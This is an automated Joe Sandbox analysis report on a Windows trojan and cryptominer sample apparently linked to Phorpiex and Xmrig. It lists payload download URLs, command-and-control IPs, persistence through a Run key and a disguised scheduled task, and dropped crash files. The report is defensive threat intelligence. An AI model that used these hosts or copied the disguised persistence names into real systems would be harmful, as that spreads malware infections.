http://schemas.xmlsoap.org/soap/envelope/	sysnldcvmr.exe, 00000007.00000000.1542059561.0000000000410000.00000002.00000001.01000000.00000009.sdmp, svchost.exe, 00000011.00000003.1859498649.000001A6A430F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1858853232.000001A6A430E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1859091834.000001A6A430E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1859818262.000001A6A430E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1859642379.000001A6A430E000.00000004.00000020.00020000.00000000.sdmp	false
http://twizt.net/lk19.exe	sysnldcvmr.exe, 00000005.00000003.1869362217.0000000004671000.00000004.00000020.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/ws/2005/02/trust	svchost.exe, 00000011.00000003.1988149862.000001A6A430F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.2078019808.000001A6A430E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.2076118628.000001A6A4377000.00000004.00000020.00020000.00000000.sdmp	false
https://92.255.85.66:5188/0f4102eec0fccd80452e/kh4wg7np.u1t0fkernelbasentdllkernel32GetProcessMitiga	svchost.exe, 0000000A.00000002.1704642025.0000000002D0C000.00000004.00000020.00020000.00000000.sdmp, fontdrvhost.exe, 0000000C.00000002.2099204640.00000270F6670000.00000040.00000001.00020000.00000000.sdmp	false
http://twizt.net/newtpp.exes	34D7.exe, 00000003.00000002.1456172857.0000000000BAE000.00000004.00000020.00020000.00000000.sdmp	false
https://login.microsoftonline.com/MSARST2.srf	svchost.exe, 00000011.00000003.1748896467.000001A6A433B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749050239.000001A6A4363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1749028589.000001A6A4340000.00000004.00000020.00020000.00000000.sdmp	false
http://twizt.net/lk10.exe	sysnldcvmr.exe, 00000005.00000003.1869362217.0000000004671000.00000004.00000020.00020000.00000000.sdmp	false
http://Passport.NET/STS	svchost.exe, 00000011.00000003.2076118628.000001A6A4382000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.2078169969.000001A6A4382000.00000004.00000020.00020000.00000000.sdmp	false
http://twizt.net/lk8.exe	sysnldcvmr.exe, 00000005.00000003.1869362217.0000000004671000.00000004.00000020.00020000.00000000.sdmp	false
http://91.202.233.141/2~	sysnldcvmr.exe, 00000005.00000002.3945918610.0000000000688000.00000004.00000020.00020000.00000000.sdmp	false
http://91.202.233.141/3S	sysnldcvmr.exe, 00000005.00000002.3945918610.0000000000688000.00000004.00000020.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/ws/2005/02/trust/Issuels01	svchost.exe, 00000011.00000003.2019245872.000001A6A436E000.00000004.00000020.00020000.00000000.sdmp	false
http://185.215.113.66/3$	sysnldcvmr.exe, 00000005.00000002.3945918610.0000000000688000.00000004.00000020.00020000.00000000.sdmp	false
http://twizt.net/lk1.exeMozilla/5.0	sysnldcvmr.exe, 00000005.00000003.1869362217.0000000004671000.00000004.00000020.00020000.00000000.sdmp	false
http://twizt.net/lk17.exe	sysnldcvmr.exe, 00000005.00000003.1869362217.0000000004671000.00000004.00000020.00020000.00000000.sdmp	false
http://91.202.233.141/2k	sysnldcvmr.exe, 00000005.00000002.3945918610.0000000000688000.00000004.00000020.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/ws/2005/02/trust/Issuels	svchost.exe, 00000011.00000003.2076652136.000001A6A436E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.2019245872.000001A6A436E000.00000004.00000020.00020000.00000000.sdmp	false
http://185.215.113.66/	896429707.exe, 00000004.00000000.1387726862.0000000000410000.00000002.00000001.01000000.00000008.sdmp, 896429707.exe, 00000004.00000002.1429902924.0000000000410000.00000002.00000001.01000000.00000008.sdmp, 896429707.exe, 00000004.00000003.1419564310.0000000000596000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000005.00000000.1419524273.0000000000410000.00000002.00000001.01000000.00000009.sdmp, sysnldcvmr.exe, 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmp, sysnldcvmr.exe, 00000007.00000002.1572624193.0000000000410000.00000002.00000001.01000000.00000009.sdmp, sysnldcvmr.exe, 00000007.00000000.1542059561.0000000000410000.00000002.00000001.01000000.00000009.sdmp	true
http://185.215.113.84/nxmr.exe($B	78476062.exe, 0000000B.00000002.1777292756.0000000000E43000.00000004.00000020.00020000.00000000.sdmp	false
http://twizt.net/lk1.exe	sysnldcvmr.exe, 00000005.00000003.1869362217.0000000004671000.00000004.00000020.00020000.00000000.sdmp	false
http://twizt.net/lk20.exe	sysnldcvmr.exe, 00000005.00000003.1869362217.0000000004671000.00000004.00000020.00020000.00000000.sdmp	false
http://185.215.113.66/pei.exeA	f5TWdT5EAc.exe, 00000000.00000002.1369536312.0000000004C7E000.00000004.00000020.00020000.00000000.sdmp	false
http://twizt.net/rh.exe$	1171111125.exe, 00000008.00000002.1602703720.0000000000CA1000.00000004.00000020.00020000.00000000.sdmp	false

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
2.187.91.108	unknown	Iran (ISLAMIC Republic Of)	58224	TCIIR	true
212.13.170.223	unknown	Kazakhstan	9198	KAZTELECOM-ASKZ	true
92.38.19.10	unknown	Czech Republic	41712	SATELITTV-ASMD	true
77.44.198.123	unknown	Syrian Arab Republic	29256	INT-PDN-STE-ASSTEPDNInternalASSY	false
77.44.150.37	unknown	Syrian Arab Republic	29256	INT-PDN-STE-ASSTEPDNInternalASSY	false
151.232.164.243	unknown	Iran (ISLAMIC Republic Of)	58224	TCIIR	false
91.202.233.141	unknown	Russian Federation	9009	M247GB	true
189.173.142.192	unknown	Mexico	8151	UninetSAdeCVMX	true
90.156.162.125	unknown	Russian Federation	25532	MASTERHOST-ASMoscowRussiaRU	false
128.65.180.156	unknown	Iran (ISLAMIC Republic Of)	43754	ASIATECHIR	false
95.56.98.17	unknown	Kazakhstan	9198	KAZTELECOM-ASKZ	false
90.156.160.54	unknown	Russian Federation	25532	MASTERHOST-ASMoscowRussiaRU	false
5.202.242.190	unknown	Iran (ISLAMIC Republic Of)	201150	DIDEHABNNETIR	false
89.219.115.156	unknown	Iran (ISLAMIC Republic Of)	12880	DCI-ASIR	true
2.133.70.66	unknown	Kazakhstan	9198	KAZTELECOM-ASKZ	true
217.30.162.161	unknown	Uzbekistan	39032	ISPETCUZ	true
109.74.69.43	unknown	Tajikistan	24722	BABILON-ASRU	true
146.120.17.117	unknown	Czech Republic	58254	NANOTELECOM-ASUZ	false
95.81.102.72	unknown	Iran (ISLAMIC Republic Of)	39308	ASK-ASIR	true
185.215.113.84	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	false
92.124.152.236	unknown	Russian Federation	12389	ROSTELECOM-ASRU	true
2.134.250.184	unknown	Kazakhstan	9198	KAZTELECOM-ASKZ	false
92.255.85.66	unknown	Russian Federation	42097	SOVTEL-ASRU	true
31.47.175.39	unknown	Russian Federation	12688	BAIKALTRANSTELECOMIrkutskRussiaRU	true
37.21.118.106	unknown	Russian Federation	12389	ROSTELECOM-ASRU	true
89.218.44.218	unknown	Kazakhstan	9198	KAZTELECOM-ASKZ	false
89.218.218.206	unknown	Kazakhstan	9198	KAZTELECOM-ASKZ	false
85.9.133.202	unknown	Tajikistan	34557	TACOM-AS47aLahutistTJ	true
90.156.163.10	unknown	Russian Federation	25532	MASTERHOST-ASMoscowRussiaRU	false
93.123.145.179	unknown	Russian Federation	35539	INFOLINK-T-ASMoscowRussiaRU	false
90.156.163.98	unknown	Russian Federation	25532	MASTERHOST-ASMoscowRussiaRU	false
187.230.224.82	unknown	Mexico	8151	UninetSAdeCVMX	false
78.109.103.103	unknown	Serbia	41897	SAT-TRAKT-ASSerbiaRS	true
151.242.48.19	unknown	Iran (ISLAMIC Republic Of)	31549	RASANAIR	true
154.71.253.54	unknown	unknown	36907	TVCaboAngolaAO	true
213.230.126.39	unknown	Uzbekistan	8193	BRM-ASUZ	true
203.142.81.102	unknown	Indonesia	17451	BIZNET-AS-APBIZNETNETWORKSID	false
95.142.87.201	unknown	Tajikistan	8847	TTL-ASTJ	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
2.179.117.33	unknown	Iran (ISLAMIC Republic Of)	58224	TCIIR	true
102.207.195.84	unknown	unknown	36926	CKL1-ASNKE	false
80.191.218.209	unknown	Iran (ISLAMIC Republic Of)	58224	TCIIR	false
109.68.122.14	unknown	Armenia	8226	AM-NIC-ASAM	true
5.251.47.42	unknown	Kazakhstan	9198	KAZTELECOM-ASKZ	false
45.150.24.42	unknown	Russian Federation	62415	MARKTELRU	true
2.176.72.136	unknown	Iran (ISLAMIC Republic Of)	12880	DCI-ASIR	true
185.215.113.66	twizt.net	Portugal	206894	WHOLESALECONNECTIONSNL	false
38.222.194.190	unknown	United States	174	COGENT-174US	true
151.234.26.66	unknown	Iran (ISLAMIC Republic Of)	58224	TCIIR	false
189.252.61.8	unknown	Mexico	8151	UninetSAdeCVMX	false
5.251.95.166	unknown	Kazakhstan	9198	KAZTELECOM-ASKZ	false
198.163.204.6	unknown	United States	7029	WINDSTREAMUS	true
213.230.99.184	unknown	Uzbekistan	8193	BRM-ASUZ	false
46.248.34.12	unknown	Iran (ISLAMIC Republic Of)	58224	TCIIR	true
90.156.160.30	unknown	Russian Federation	25532	MASTERHOST-ASMoscowRussiaRU	true
189.150.7.86	unknown	Mexico	8151	UninetSAdeCVMX	false
37.120.247.128	unknown	Romania	41984	MCC-ASRO	false
2.133.136.145	unknown	Kazakhstan	9198	KAZTELECOM-ASKZ	true
89.236.219.80	unknown	Uzbekistan	39032	ISPETCUZ	false
95.59.165.102	unknown	Kazakhstan	9198	KAZTELECOM-ASKZ	true
2.190.224.152	unknown	Iran (ISLAMIC Republic Of)	12880	DCI-ASIR	false
201.138.180.213	unknown	Mexico	8151	UninetSAdeCVMX	false
212.22.213.217	unknown	Ukraine	31148	FREENET_LLCUA	false
134.35.64.189	unknown	Yemen	30873	PTC-YEMENNETYE	false
88.204.241.182	unknown	Kazakhstan	9198	KAZTELECOM-ASKZ	true
38.224.37.24	unknown	United States	174	COGENT-174US	false
5.76.0.203	unknown	Kazakhstan	9198	KAZTELECOM-ASKZ	true
176.67.79.229	unknown	Iran (ISLAMIC Republic Of)	48944	ASKHALIJFARSONLINEIR	false
189.167.22.36	unknown	Mexico	8151	UninetSAdeCVMX	true
85.73.234.113	unknown	Greece	6799	OTENET-GRAthens-GreeceGR	false
89.236.217.71	unknown	Uzbekistan	39032	ISPETCUZ	true
90.156.160.6	unknown	Russian Federation	25532	MASTERHOST-ASMoscowRussiaRU	false
151.243.58.90	unknown	Iran (ISLAMIC Republic Of)	31549	RASANAIR	false
90.156.162.5	unknown	Russian Federation	25532	MASTERHOST-ASMoscowRussiaRU	true
89.249.62.7	unknown	Russian Federation	50164	RFTV-ASRU	true
178.67.165.88	unknown	Russian Federation	12389	ROSTELECOM-ASRU	true
2.176.94.43	unknown	Iran (ISLAMIC Republic Of)	12880	DCI-ASIR	false
178.237.33.50	geoplugin.net	Netherlands	8455	ATOM86-ASATOM86NL	false
5.236.121.2	unknown	Iran (ISLAMIC Republic Of)	58224	TCIIR	false
90.156.163.119	unknown	Russian Federation	25532	MASTERHOST-ASMoscowRussiaRU	false
2.177.40.206	unknown	Iran (ISLAMIC Republic Of)	12880	DCI-ASIR	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1569290
Start date and time:	2024-12-05 17:30:41 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 15m 31s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	52
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	f5TWdT5EAc.exe renamed because original name is a hash value
Original Sample Name:	b992a18f00c902840fcd2bb93223a8cd58d0da1d9e142a90523931aa3f140276.exe
Detection:	MAL
Classification:	mal100.troj.evad.mine.winEXE@66/62@3/81
EGA Information:	Successful, ratio: 63.2%
HCA Information:	Successful, ratio: 52% Number of executed functions: 120 Number of non-executed functions: 213
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, backgroundTaskHost.exe, schtasks.exe
Excluded IPs from analysis (whitelisted): 20.109.209.108, 40.126.53.11, 40.126.53.10, 20.190.181.4, 40.126.53.9, 20.190.181.0, 20.190.181.23, 40.126.53.19, 20.231.128.67, 52.168.117.173
Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, prdv4a.aadg.msidentity.com, slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, www.tm.v4.a.prd.aadg.trafficmanager.net, ctldl.windowsupdate.com, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, redir.update.msft.com.trafficmanager.net, www.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, azureedge-t-prod.trafficmanager.net, umwatson.events.data.microsoft.com, www.tm.lg.prod.aadmsa.trafficmanager.net
Execution Graph export aborted for target 2688734187.exe, PID 2652 because it is empty
Execution Graph export aborted for target f5TWdT5EAc.exe, PID 7420 because there are no executed function
Execution Graph export aborted for target powershell.exe, PID 4960 because it is empty
Execution Graph export aborted for target powershell.exe, PID 7296 because it is empty
Execution Graph export aborted for target svchost.exe, PID 8108 because there are no executed function
Execution Graph export aborted for target winupsecvmgr.exe, PID 2960 because it is empty
Execution Graph export aborted for target winupsecvmgr.exe, PID 3820 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing network information.
Report size getting too big, too many NtCreateFile calls found.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtQueryVolumeInformationFile calls found.
Report size getting too big, too many NtReadFile calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: f5TWdT5EAc.exe

Simulations

Behavior and APIs

Time	Type	Description
11:31:51	API Interceptor	130512x Sleep call for process: sysnldcvmr.exe modified
11:32:02	API Interceptor	1x Sleep call for process: 1171111125.exe modified
11:32:29	API Interceptor	161x Sleep call for process: powershell.exe modified
11:32:49	API Interceptor	2x Sleep call for process: WerFault.exe modified
11:33:07	API Interceptor	1130x Sleep call for process: conhost.exe modified
11:35:55	API Interceptor	1x Sleep call for process: svchost.exe modified
17:31:51	Autostart	Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run Windows Settings C:\Windows\sysnldcvmr.exe
17:32:34	Task Scheduler	Run new task: Microsoft Windows Security path: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
151.232.164.243	newtpp.exe	Get hash	malicious	Xmrig	Browse
91.202.233.141	newtpp.exe	Get hash	malicious	Xmrig	Browse	91.202.233.141/2
	LM94OE0VNK.exe	Get hash	malicious	Unknown	Browse	91.202.233.141/gonup
	file.exe	Get hash	malicious	Unknown	Browse	91.202.233.141/HKLMINSTOK
	hH13f3q2kF.exe	Get hash	malicious	Unknown	Browse	91.202.233.141/WINLASTFIX
	U9jAFGWgPG.exe	Get hash	malicious	Phorpiex, Xmrig	Browse	91.202.233.141/3
	ukOlLduCBM.exe	Get hash	malicious	Phorpiex, Xmrig	Browse	91.202.233.141/4
	Bjl3geiFEK.exe	Get hash	malicious	Phorpiex	Browse	91.202.233.141/dwntbl
	T52Z708x2p.exe	Get hash	malicious	Phorpiex, Xmrig	Browse	91.202.233.141/5
	lJ4EzPSKMj.exe	Get hash	malicious	Phorpiex, Xmrig	Browse	91.202.233.141/5
	Us051y7j25.exe	Get hash	malicious	Phorpiex, Xmrig	Browse	91.202.233.141/1

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
twizt.net	LM94OE0VNK.exe	Get hash	malicious	Unknown	Browse	185.215.113.66
	U9jAFGWgPG.exe	Get hash	malicious	Phorpiex, Xmrig	Browse	185.215.113.66
	ukOlLduCBM.exe	Get hash	malicious	Phorpiex, Xmrig	Browse	185.215.113.66
	T52Z708x2p.exe	Get hash	malicious	Phorpiex, Xmrig	Browse	185.215.113.66
	thcdVit1dX.exe	Get hash	malicious	Phorpiex	Browse	185.215.113.66
	dgiX55cHyU.exe	Get hash	malicious	Phorpiex, Xmrig	Browse	185.215.113.66
	SecuriteInfo.com.Trojan.DownLoader46.2135.13298.13900.exe	Get hash	malicious	Phorpiex, Xmrig	Browse	185.215.113.66
	qRavA0Sorz.exe	Get hash	malicious	Unknown	Browse	185.215.113.66
	qRavA0Sorz.exe	Get hash	malicious	Unknown	Browse	185.215.113.66
	SecuriteInfo.com.Trojan.DownLoader46.63386.25844.4041.exe	Get hash	malicious	Phorpiex, Xmrig	Browse	185.215.113.66
s-part-0035.t-0009.t-msedge.net	lj8shy7Er0.exe	Get hash	malicious	GuLoader	Browse	13.107.246.63
	BUE1EnkN5v.exe	Get hash	malicious	GuLoader	Browse	13.107.246.63
	http://web-quorvyn.azurewebsites.net	Get hash	malicious	TechSupportScam	Browse	13.107.246.63
	8JuGuaUaZP.exe	Get hash	malicious	AgentTesla	Browse	13.107.246.63
	https://vacilandoblog.wordpress.com/2015/04/22/a-tribute-to-my-mother-in-law-rest-in-peace-april-22-2015/	Get hash	malicious	Unknown	Browse	13.107.246.63
	MOV-0903787857-(Jmulvey)MMS0%3A28.mp4.html	Get hash	malicious	HTMLPhisher	Browse	13.107.246.63
	http://womenluxuryfashion.com	Get hash	malicious	TechSupportScam	Browse	13.107.246.63
	O7T6gwPvqA.exe	Get hash	malicious	ScreenConnect Tool	Browse	13.107.246.63
	#U25b6#Ufe0fPlayVoiceMessage9312.eml	Get hash	malicious	Unknown	Browse	13.107.246.63
	file.exe	Get hash	malicious	LummaC Stealer	Browse	13.107.246.63
geoplugin.net	17333253674c71ac3d5875ca830e11f4630bf65d3b8b7e2686361e216df980d330c80afb30623.dat-decoded.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	togiveme.doc	Get hash	malicious	Remcos	Browse	178.237.33.50
	greatnew.doc	Get hash	malicious	Remcos	Browse	178.237.33.50
	1733313724403c020f6e88b0c933bdcc8580dbdc997912d71ff6e423ca5d8288c03cec53d3177.dat-decoded.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	cUxXrdUvYR.rtf	Get hash	malicious	Remcos	Browse	178.237.33.50
	Amoxycillin Trihydrate Powder.docx.doc	Get hash	malicious	Remcos	Browse	178.237.33.50
	Order_DEC2024.wsf	Get hash	malicious	Remcos	Browse	178.237.33.50
	#U041f#U043b#U0430#U0449#U0430#U043d#U0435.docx	Get hash	malicious	Remcos	Browse	178.237.33.50
	7a67aa0f4b0c33b1bd9acf18ea4e96d357e8198c5eaaab2404e9f6802db3fb87_d.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	Company Profile and new order-202401127.scr.exe	Get hash	malicious	Remcos, GuLoader	Browse	178.237.33.50

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
KAZTELECOM-ASKZ	x86_32.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	88.204.146.7
	arm5.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	2.132.18.25
	teste.sh4.elf	Get hash	malicious	Gafgyt, Mirai, Moobot, Okiru	Browse	5.76.75.240
	sora.sh4.elf	Get hash	malicious	Mirai	Browse	2.135.247.80
	spc.elf	Get hash	malicious	Mirai	Browse	92.46.135.116
	m68k.elf	Get hash	malicious	Mirai, Moobot	Browse	178.91.20.28
	newtpp.exe	Get hash	malicious	Xmrig	Browse	89.218.244.178
	loligang.arm7.elf	Get hash	malicious	Mirai	Browse	178.88.54.59
	loligang.mpsl.elf	Get hash	malicious	Mirai	Browse	178.88.253.234
	arm7.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	2.134.102.26
INT-PDN-STE-ASSTEPDNInternalASSY	teste.arm5.elf	Get hash	malicious	Gafgyt, Mirai, Moobot, Okiru	Browse	46.213.226.219
	sora.mips.elf	Get hash	malicious	Mirai	Browse	95.212.167.41
	la.bot.powerpc.elf	Get hash	malicious	Mirai	Browse	46.57.132.171
	la.bot.mips.elf	Get hash	malicious	Unknown	Browse	178.171.200.56
	loligang.x86.elf	Get hash	malicious	Mirai	Browse	82.100.172.69
	arm7.elf	Get hash	malicious	Mirai, Moobot	Browse	46.213.104.10
	newtpp.exe	Get hash	malicious	Xmrig	Browse	82.137.239.235
	i586.elf	Get hash	malicious	Unknown	Browse	90.153.236.174
	mpsl.elf	Get hash	malicious	Mirai	Browse	5.155.42.101
	loligang.mips-20241128-1536.elf	Get hash	malicious	Mirai	Browse	94.252.193.161
TCIIR	teste.arm.elf	Get hash	malicious	Gafgyt, Mirai, Moobot, Okiru	Browse	2.182.36.10
	teste.arm.elf	Get hash	malicious	Gafgyt, Mirai, Moobot, Okiru	Browse	85.185.220.58
	mipsel.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	5.234.71.69
	powerpc.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	5.235.129.139
	botnet.m68k.elf	Get hash	malicious	Mirai, Moobot	Browse	91.232.73.18
	mpsl.elf	Get hash	malicious	Mirai	Browse	2.182.238.121
	arm7-20241130-2047.elf	Get hash	malicious	Mirai	Browse	31.193.145.41
	sora.sh4.elf	Get hash	malicious	Mirai	Browse	80.191.125.123
	loligang.spc.elf	Get hash	malicious	Mirai	Browse	151.235.64.23
	loligang.arm.elf	Get hash	malicious	Mirai	Browse	2.182.103.170
INT-PDN-STE-ASSTEPDNInternalASSY	teste.arm5.elf	Get hash	malicious	Gafgyt, Mirai, Moobot, Okiru	Browse	46.213.226.219
	sora.mips.elf	Get hash	malicious	Mirai	Browse	95.212.167.41
	la.bot.powerpc.elf	Get hash	malicious	Mirai	Browse	46.57.132.171
	la.bot.mips.elf	Get hash	malicious	Unknown	Browse	178.171.200.56
	loligang.x86.elf	Get hash	malicious	Mirai	Browse	82.100.172.69
	arm7.elf	Get hash	malicious	Mirai, Moobot	Browse	46.213.104.10
	newtpp.exe	Get hash	malicious	Xmrig	Browse	82.137.239.235
	i586.elf	Get hash	malicious	Unknown	Browse	90.153.236.174
	mpsl.elf	Get hash	malicious	Mirai	Browse	5.155.42.101
	loligang.mips-20241128-1536.elf	Get hash	malicious	Mirai	Browse	94.252.193.161

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_2910625892.exe_3bf245b75b14244fde194fd7cd2a0d6f410bda9_61efd67b_4b383156-2409-4b57-a564-4ac380a546fc\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9164877006345423
Encrypted:	false
SSDEEP:	96:h9KcFsCDcry/Osf9htff7gfN4QXIDcQvc6QcEVcw3cE/lpz+HbHg/EFAS/YyNl4H:nWO/Ob0BU/QjrJyzuiFHZ24IO8aB
MD5:	45B107AAE403E9DE4255CF0DDD5C6093
SHA1:	1B06562F97A32DE704ED08A6B76773A74CE06EE9
SHA-256:	AA004CF8326C7C6B5ECD5D1228219BF8409DAFA009B774339D9DB8638403A8F0
SHA-512:	AC753B4E74AFC1B800A764CC3EE6BB03EB5F4574E04A98B4AA4A9B106FEC27B26D0FC1A8D37AD462C247625F1B7899D1BCF47937F7152151894B2B827616E503
Malicious:	false
Reputation:	unknown
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.7.8.8.9.9.5.9.5.8.4.3.5.1.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.7.8.8.9.9.6.0.9.9.0.6.0.9.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.b.3.8.3.1.5.6.-.2.4.0.9.-.4.b.5.7.-.a.5.6.4.-.4.a.c.3.8.0.a.5.4.6.f.c.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.1.0.8.b.9.6.a.-.8.2.9.9.-.4.7.4.f.-.b.3.7.8.-.0.2.f.b.9.3.7.7.2.e.a.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.2.9.1.0.6.2.5.8.9.2...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.7.3.c.-.0.0.0.1.-.0.0.1.3.-.8.9.d.4.-.e.d.4.9.3.3.4.7.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.a.8.b.9.f.3.1.e.a.0.a.3.3.e.5.b.4.4.a.1.7.0.4.b.8.9.f.0.a.6.2.0.0.0.0.f.f.f.f.!.0.0.0.0.e.5.a.b.b.a.9.5.e.1.5.8.8.9.5.0.c.6.3.8.8.c.9.9.5.0.4.1.7.c.2.f.b.8.a.e.b.c.e.2.!.2.9.1.0.6.2.5.8.9.2...e.x.e.....T.a.r.g.e.t.A.p.p.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_fontdrvhost.exe_d32c824e8915b30da4efd4eabd13e74e4ef8c1_ad0be647_812698ed-7ee4-4381-b307-05ed556f8341\Report.wer

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.6601482262377685
Encrypted:	false
SSDEEP:	96:O8KZFlB3ekAuqigKJns3Wrk41yHpHS2QXIDcQkc6tcEycw3ZUtzJzQ+HbHgrZ2Z4:sZJJHnnxR0apYKjqzuiFHZ24lO8JOC
MD5:	53BD5DA14E956B825D04FC704DC923BF
SHA1:	93062966AFF350C9BE19634C3677F26D603F67E1
SHA-256:	722EC5D4E1A1B0363F33539CD5D5DA1337B0E4A9735EB8443559CBD076CE420E
SHA-512:	73A6C68071CBDF2E05E2EE3AA0278D49B213DF6AD3C3C7A7296329373C09DA323E58E65CD858772CB26D3B36A9DBBBEBA7E6CFE2696FB9876E1B0CED957776C4
Malicious:	false
Reputation:	unknown
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.6.4.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.7.8.8.9.9.3.9.7.2.8.5.1.1.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.7.8.8.9.9.4.0.4.3.1.6.4.8.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.1.2.6.9.8.e.d.-.7.e.e.4.-.4.3.8.1.-.b.3.0.7.-.0.5.e.d.5.5.6.f.8.3.4.1.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.e.f.1.2.8.0.d.-.e.e.c.4.-.4.b.2.7.-.9.4.e.0.-.a.d.0.8.5.a.f.d.7.b.e.d.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.f.o.n.t.d.r.v.h.o.s.t...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.f.o.n.t.d.r.v.h.o.s.t...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.5.4.4.-.0.0.0.1.-.0.0.1.3.-.5.a.d.3.-.d.6.3.e.3.3.4.7.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.5.e.f.b.3.f.9.7.3.4.2.b.a.1.9.5.4.2.4.1.3.4.f.2.8.f.9.7.7.d.a.9.e.0.d.6.a.a.9.1.!.f.o.n.t.d.r.v.h.o.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER2978.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Thu Dec 5 16:32:40 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	99920
Entropy (8bit):	1.758566581944912
